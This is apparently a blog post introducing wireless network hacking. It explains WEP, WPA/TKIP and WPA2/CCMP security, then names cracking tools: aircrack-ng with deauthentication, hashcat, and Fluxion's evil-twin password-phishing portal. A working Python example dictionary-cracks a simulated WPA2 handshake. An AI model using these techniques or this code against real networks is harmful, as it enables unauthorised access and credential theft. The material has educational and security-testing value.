Wireless hacking - introduction (Part 1)

With the radical increase in mobile devices and computers, and the exponentially growing number of IoT devices we have seen in the last decade, wireless technology has become an essential part of the way we communicate with the world. It clearly would not be practical to have an Ethernet cable connected to every device at home and in the workplace, which is why you will find a wireless network in almost any home or workplace in the western world. But do all of these wireless access points make it possible to compromise the security of your network? Ever since the dawn of wireless communication there have been security issues with the 802.11 standards. Even though wireless security keeps getting better, with an ongoing evolution from WEP through WPA and WPA2 (and convenience features such as WPS), you still cannot get away from the plain fact that the medium is radio: anyone within range can receive your traffic, and anyone who obtains the right credentials can join your network without ever needing physical access to it.

Jesse R. Walker, then at Intel, wrote one of the first papers on the security of the IEEE 802.11 standard. It argued that the cipher suite used by 802.11 at the time (WEP) was insecure (Walker, 2000). The industry had already recognised this, and many thought the solution was simply to lengthen the 40-bit key to a 128-bit one. Walker argued that this would not fix the problem: WEP encrypts with the RC4 stream cipher and, because of its short 24-bit initialization vector, ends up reusing keystreams. The weakness lies in how the keystream is generated and reused, not in the key length, so whether the key is 1 bit or 1000 bits long, the WEP data stream remains vulnerable.

In response to the serious weaknesses found in the WEP encryption standard, two new standards were developed: Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2). Both security protocols were developed by the Wi-Fi Alliance, a non-profit industry organization (Park & Dico, 2003).

WPA

With the arrival of the new WPA security standard came a protocol called TKIP (Temporal Key Integrity Protocol) (Paterson, Poettering, & Schuldt, 2014, ss. 1-2). TKIP was integrated into the WPA standard to put something unique into every encryption key used on the network, so that each packet is encrypted with its own per-packet key.

TKIP was implemented with a few additional security measures that were lacking in the previous WEP standard. These include:

Mixed keys: One of the improvements found in the TKIP protocol is that it uses key mixing. Instead of simply concatenating a secret key with an initialization vector, as WEP did, it mixes the temporal (root) key with the transmitter's MAC address and the packet sequence counter, which takes over the role of the initialization vector. The resulting per-packet key is unique and constantly changing, which closes the keystream-reuse hole in WEP (Lashkari, Danesh, & Samadi, 2009, ss. 3-4).

Sequence numbers: When someone performs a replay attack they typically record some traffic going over the network and then replay the same traffic to gain access to a resource. Since TKIP adds a sequence number to each packet, every packet has a unique characteristic, and a packet whose sequence number is not higher than the last one accepted is automatically dropped. This makes replay attacks much harder (Vanhoef & Piessens, 2013, ss. 2-3).

MIC: There is also an integrity mechanism built into the TKIP protocol, a 64-bit message integrity check (known as Michael). The transmitter runs the message through the MIC algorithm and appends the resulting value as a tag to the data. When the receiver gets the packet, it recomputes the value over the received message with the same algorithm and key; if the result matches the tag sent by the transmitter the message is accepted, otherwise it is dropped (Lashkari, Danesh, & Samadi, 2009, s. 3; Cam-Winget, Housley, Wagner, & Walker, 2003, s. 3). This assures that the message received is the same as the message sent and thereby protects against forged or tampered packets, which is what an attacker sitting in the middle of the connection would otherwise inject. Note that Michael was deliberately kept weak so that it could run on existing WEP hardware; WPA therefore adds countermeasures that shut the connection down and rekey after two MIC failures within a minute.

WPA2

One year after the release of the WPA standard, WPA2 was released (Kumkar, Tiwari, Tiwari, Gupta, & Shrawne, 2012, s. 1). This is the security standard most people use today. Even though it is still possible to use TKIP with WPA2, the newer AES-CCMP cipher suite is usually preferred: it replaces RC4 with the AES block cipher and replaces Michael with a cryptographically strong integrity check.

Both TKIP and AES-CCMP build on the same key hierarchy and operate similarly at the packet level (per-packet uniqueness, a replay counter and an integrity tag). The main difference, besides AES being a much stronger cipher, is the number of keys used: TKIP derives separate keys for encryption and for the integrity check, whereas AES-CCMP uses a single key for both, since CCM mode provides encryption and integrity together, as shown in the picture below (Perez, 2004, s. 15).

To crack these networks, several tools are going to be used. These are the main ones:

Aircrack-ng

This is a very powerful suite of utilities for auditing and cracking wireless networks; I will mainly be using these:

  • Airmon-ng: puts the Wi-Fi adapter into monitor mode so that it captures every frame on a channel, not just those addressed to it.
  • Aireplay-ng: injects traffic into the network, for example deauthentication frames that force a client to reconnect and redo the handshake.
  • Airodump-ng: captures raw 802.11 frames, including the WPA handshake, and writes them to a capture file.
  • Aircrack-ng: recovers the key from the packets captured with airodump-ng, by statistical attacks on WEP or a dictionary attack on the captured WPA/WPA2 handshake.

Hashcat

This is also a very powerful and widely used tool, recognised by many as the fastest password cracker in the world, mostly because it runs its calculations on GPUs rather than relying on CPUs. I will be using it to run a dictionary or brute-force attack against the captured WPA2 four-way handshake.
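What "cracking the handshake" actually computes, for the hashcat paragraph above and the aircrack-ng tool list, is shown in the following added example. It is not code from this post or from the hashcat or aircrack-ng projects; it reconstructs the per-candidate work a cracker does: PBKDF2 from passphrase and SSID to the PMK, the 802.11i PRF to the PTK (whose first 16 bytes, the KCK, sit at the top of the key hierarchy the WPA2 section refers to), and the EAPOL-Key MIC over message 2 of the four-way handshake. The SSID, passphrase, MAC addresses, nonces and the EAPOL frame are all constructed here; no real capture is used.

```python
import hashlib
import hmac
import struct

# All of these values are constructed for the demonstration; nothing here comes
# from a real capture.
SSID = b"HomeNet"
PASSPHRASE = "correct horse"
AP_MAC = bytes.fromhex("001122334455")    # authenticator address (AA)
STA_MAC = bytes.fromhex("66778899aabb")   # supplicant address (SPA)
ANONCE = bytes(range(0x10, 0x30))         # 32-byte AP nonce from message 1
SNONCE = bytes(range(0x60, 0x80))         # 32-byte station nonce from message 2

# Offset of the 16-byte MIC inside an EAPOL-Key frame:
# 802.1X header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + IV (16) + RSC (8) + ID (8)
MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """WPA/WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the expensive step a cracker repeats once per candidate passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces)).
    The PTK is split into the KCK (signs handshake messages), the KEK (wraps the group key)
    and the TK (encrypts data frames; CCMP uses a 16-byte TK, TKIP uses 32 bytes)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf_512(pmk, b"Pairwise key expansion", data)
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48], "ptk": ptk}


def build_eapol_msg2(snonce: bytes, replay_counter: int = 1, rsn_ie: bytes = b"") -> bytes:
    """Constructed message 2 of the four-way handshake (station -> AP) with a zeroed MIC field.
    Key info 0x010a = descriptor version 2 (HMAC-SHA1 MIC), pairwise key, MIC bit set."""
    body = struct.pack(">BHHQ", 2, 0x010A, 0, replay_counter)  # descriptor type 2 = RSN
    body += snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16)  # nonce, IV, RSC, ID, MIC
    body += struct.pack(">H", len(rsn_ie)) + rsn_ie
    return struct.pack(">BBH", 2, 3, len(body)) + body  # 802.1X v2, type 3 = EAPOL-Key


def eapol_mic(kck: bytes, eapol: bytes, version: int = 2) -> bytes:
    """Key MIC over the whole EAPOL frame with the MIC field zeroed.
    Version 1 (TKIP) uses HMAC-MD5, version 2 (CCMP) uses HMAC-SHA1; both truncate to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    digestmod = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digestmod).digest()[:16]


def simulate_capture() -> bytes:
    """Stand-in for airodump-ng: produce the message-2 frame a real station would send,
    i.e. with the MIC computed from the true passphrase."""
    kck = derive_ptk(pmk_from_passphrase(PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)["kck"]
    frame = build_eapol_msg2(SNONCE)
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack_handshake(ssid, aa, spa, anonce, snonce, eapol, wordlist):
    """What aircrack-ng / hashcat do per candidate: derive PMK -> PTK -> KCK, recompute the
    MIC over the captured message 2 and compare with the MIC in the capture."""
    observed_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)["kck"]
        if hmac.compare_digest(eapol_mic(kck, eapol), observed_mic):
            return candidate
    return None


if __name__ == "__main__":
    captured = simulate_capture()
    wordlist = ["123456", "password", "letmein", "correct horse", "hunter2"]
    print("recovered passphrase:", crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, captured, wordlist))
```

Everything the cracker needs is in the capture (SSID, the two MAC addresses, both nonces and the MIC'd EAPOL frame); hashcat's mode 22000 takes exactly these fields. The cost per candidate is dominated by the 4096 HMAC-SHA1 rounds of PBKDF2, which is why a GPU-based cracker is so much faster than a CPU one and why a long, non-dictionary passphrase is the only real defence for WPA2-Personal.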

Fluxion

Fluxion is a tool which has made the whole process of hacking a wireless network incredibly easy. Fluxion builds on tools such as aircrack-ng, but adds some clever social engineering to the process: it sets up a fake (evil twin) access point with the same name as the target and a captive portal that asks the victim for the Wi-Fi password. I will be using this tool to get access to the last network.
